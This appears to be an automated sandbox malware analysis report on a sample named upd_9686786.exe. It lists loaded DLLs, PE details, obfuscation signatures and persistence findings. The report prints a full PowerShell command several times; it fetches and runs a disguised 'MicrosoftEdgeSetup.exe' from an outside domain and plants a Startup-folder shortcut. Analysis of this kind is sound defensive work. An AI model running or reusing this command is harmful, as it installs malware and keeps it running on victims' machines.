Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mshtml.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msiso.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ieframe.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
Source: C:\Windows\System32\systeminfo.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: tuygh.lnk.2.dr LNK file: ..\..\..\..\..\..\..\Desktop\upd_9686786.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: upd_9686786.exe Static PE information: certificate valid
Source: upd_9686786.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: upd_9686786.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ion.pdbS]K source: powershell.exe, 00000009.00000002.30279686077.00000215F4476000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.30276312197.0000020DF2D7E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6?t.Automation.pdb+ source: powershell.exe, 00000009.00000002.30279975334.00000215F44BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb source: powershell.exe, 00000009.00000002.30279975334.00000215F44BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System32\wshom.ocxb.pdb^ source: powershell.exe, 00000009.00000002.30279975334.00000215F44BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb6.1.4.1.311. source: powershell.exe, 00000009.00000002.30274860324.0000020DF2CF4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdbb source: powershell.exe, 00000002.00000002.30012245368.00000177764AA000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Suspicious powershell command line found
Source: C:\Users\user\Desktop\upd_9686786.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()"
Source: C:\Users\user\Desktop\upd_9686786.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()"
Source: C:\Users\user\Desktop\upd_9686786.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()" Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()" Jump to behavior
PE file contains an invalid checksum
Source: upd_9686786.exe Static PE information: real checksum: 0x209e2 should be: 0x1d80b
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\upd_9686786.exe Code function: 0_2_00007FF76E651000 push rdx; ret 0_2_00007FF76E65101F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC94BCADA2 pushad ; retf 2_2_00007FFC94BCADB1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC94BCD6FD push ebx; retn 0009h 2_2_00007FFC94BCD79A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC94BC7C1E push eax; retf 2_2_00007FFC94BC7C2D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC94BC841E push eax; ret 2_2_00007FFC94BC842D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC94BC7BEE pushad ; retf 2_2_00007FFC94BC7C1D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC94BC83EE pushad ; ret 2_2_00007FFC94BC841D

Boot Survival
barindex
Powershell creates an autostart link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: .lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree).
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: .lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree).
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tuygh.lnk Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tuygh.lnk Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
